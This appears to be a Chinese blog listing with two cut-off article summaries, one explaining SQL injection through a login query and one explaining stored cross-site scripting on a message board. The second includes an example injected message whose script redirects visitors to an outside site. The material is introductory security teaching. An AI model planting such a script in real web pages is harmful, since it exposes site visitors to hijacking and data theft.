摘要： SQL注入主条目：SQL InjectionSQL注入是种乘SQL语法之利注入可读取或者修改数据库、或者扭曲原始查询意义的命令。以一个网页有两个字段让用户输入用户名与密码为例，在该网页幕后工作的代码会产生SQL查询以检查密码是否与用户名称密码列表相符：SELECT UserList.UsernameFROM UserListWHERE UserList.Username = 'Username'A... 阅读全文

摘要： 举例说，有一间公司的网页服务器上有一个留言板的代码，用来让用户发表简短的口信，例如： hello word!!!!不过，这个代码原来有漏洞。一个意图入侵者得悉这间公司采用了有问题的代码，于是试图通过留下一条附带有代码的口信，例如：Nice Site, I think I'll take it.><script>document.location='http://www.cnblo... 阅读全文